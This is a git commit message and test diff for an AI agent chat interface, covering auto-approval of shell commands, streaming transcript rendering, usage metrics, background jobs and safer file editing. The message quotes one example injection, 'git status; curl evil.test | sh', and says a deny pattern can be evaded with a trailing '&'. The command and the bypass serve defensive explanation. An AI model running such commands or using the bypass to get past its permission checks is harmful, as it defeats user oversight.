A reply you can read while it is still being written

Seven things, and the thread running through them is that the machinery was
right and what a person saw of it was not.

Auto asked about every compound command. `policy.subject` refuses to let any
pattern match a line carrying a shell metacharacter -- correct, and the whole
reason `git *` cannot also mean `git status; curl evil.test | sh` -- and a rule
on top of that asked whenever a deny list existed at all. The shipped deny list
is non-empty, so `cd build && make` and `pytest | tail` both stopped for
approval in the one mode whose purpose is not stopping. Nobody read that as a
security control; they read it as Auto not working. It is gone, and what it
costs is written down beside it and under the admin field: a deny pattern can be
walked past with a trailing `&`. Matching each segment would restore both.

A forty-round agent reply rendered as three zones -- all the thinking, then
every tool block, then all the prose -- which is fine at two rounds and
unreadable at forty. `Message.steps_json` is a table of contents over the three
stores rather than a fourth copy of any of them, so `build_messages`, compaction
and titling still see one string. No marks means the old layout, which is what
every existing row reads back, with no version flag and no branch in the
template.

Nothing could be expanded while a reply streamed, and that was two faults. The
tool list was replaced wholesale twelve times a second, so an opened block shut
itself within 80ms; the ids are stable now and steps.js puts them back, across
the final swap as well. And the thread snapped to the bottom on every frame, so
a block that did open was scrolled off -- opening one now stops it following
until you scroll back down yourself. Both driven under a DOM stub before
committing, per the note in CLAUDE.md.

The metrics were never wrong, which is why this looked like arithmetic and was
not. One chip is what the reply cost and the other is what the conversation
occupies; on a multi-round reply those differ by a lot and neither said which it
was. What was broken is that they stood still -- usage arrives once a round, and
`reported or estimated` stops consulting the estimate the moment the first chunk
lands -- and that the `~` marking an estimate vanished at exactly the point
everything became one. Interpolated between counts now, never over them.

Background jobs had no surface at all. A chip counting what is still running and
a panel with each job's command, state, log tail and a Stop button; the fifth
exception to "the modes govern the model, not the interface", for the reason the
other four are.

file_edit had two faults worth more than the error text. A file it could not
read was reported to the model as an empty one, and a file too large to read
whole was patched and written back by a call that replaces -- deleting
everything past the ceiling, silently, and reporting success with a byte count.
Both refused now. A refused hunk also prints the file around where it landed,
which is most of the retry loop these models get into.

And a model can talk itself to a standstill: a round with no tool calls is a
model saying it has finished, so pages of "Ready? GO! ... Wait ... Actually ..."
ended the reply having done nothing. `core.commit` is the prompt half and a
second nudge signal is the other, narrowed to a long reply that touched nothing
so that finishing is never argued with.

Also: the scope menu is called Toggle and no longer offers to type an `@` for
you, and "Always allow this" says when it has stored nothing rather than
appearing to work.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
This commit is contained in:
Jaroslav Beneš
2026-08-04 19:02:07 +02:00
parent c0d6056ec4
commit 7df68eb44c
45 changed files with 2777 additions and 273 deletions
+68
View File
@@ -9,6 +9,7 @@ tidying up later.
from __future__ import annotations
import re
from pathlib import Path
import lembas
@@ -64,3 +65,70 @@ def test_every_prompt_button_names_a_field_or_takes_the_default():
continue
# Either an explicit field, or the "name" default the handler applies.
assert "data-prompt-field" in text or "/api/folders" in text, path
# --- The transcript's open blocks, and the scroll that used to chase them ------
STEPS = (ROOT / "web/static/js/steps.js").read_text(encoding="utf-8")
APP = (ROOT / "web/static/js/app.js").read_text(encoding="utf-8")
def test_the_toggle_listener_is_registered_in_the_capture_phase():
"""`toggle` does not bubble. Registered without the third argument the
listener is never called, in every browser, with nothing anywhere to say so
-- the same shape as a trigger bound where the event does not go, which cost
two selects an entire release.
Asserted as the property rather than as the markup, for that reason.
"""
found = re.search(r'"toggle",[\s\S]{0,600}?\n\s*(true|false)\n\s*\);', APP)
assert found, "the toggle listener is gone"
assert found.group(1) == "true"
def test_the_scroll_listener_is_too():
"""A scroll event does not bubble either, and this one is on the thread
rather than on the document it is registered against."""
found = re.search(r'"scroll",[\s\S]{0,600}?\n\s*(true|false)\n\s*\);', APP)
assert found, "the scroll listener is gone"
assert found.group(1) == "true"
def test_the_stream_no_longer_scrolls_for_every_frame():
"""`metrics`, `status`, `ask` and `canvas` all arrive on htmx:sseMessage,
and none of them changes the height of the thread. Scrolling for all of them
is what made an opened block impossible to keep on screen."""
found = re.search(r'htmx:sseMessage", function \(event\) \{([\s\S]{0,400}?)\n \}\);', APP)
assert found, "the handler is gone"
assert "thread-scroll" in found.group(1)
def test_the_open_state_is_recorded_before_the_swap_and_restored_after():
"""Both halves, or it is a module that does nothing. The container is
replaced with innerHTML twelve times a second, so anything not written down
first is gone by the time there is somewhere to put it back."""
assert "htmx:sseBeforeMessage" in STEPS
assert "htmx:sseMessage" in STEPS
assert "htmx:afterSwap" in STEPS
def test_it_never_cancels_the_frame_it_is_listening_to():
"""htmx:sseBeforeMessage is cancellable -- the extension reads what handlers
return to decide whether to swap at all. Cancelling here would freeze the
transcript with no error anywhere."""
assert "preventDefault" not in STEPS
def test_an_id_is_escaped_rather_than_concatenated_into_a_selector():
"""The same rule `data-prompt` follows for hx-vals. An id is a message id
and two integers today; a selector assembled by hand is how that stops being
true safely."""
assert "CSS.escape" in STEPS
def test_the_finished_bubble_repeats_the_live_container_s_id():
"""That is the whole mechanism for carrying an opened block across the
`done` frame, which replaces the entire article: same id on the container,
same ids inside it, because both come from the mark index."""
message = (TEMPLATES / "chat/_message.html").read_text(encoding="utf-8")
assert message.count('id="steps-{{ message.id }}" data-steps') == 2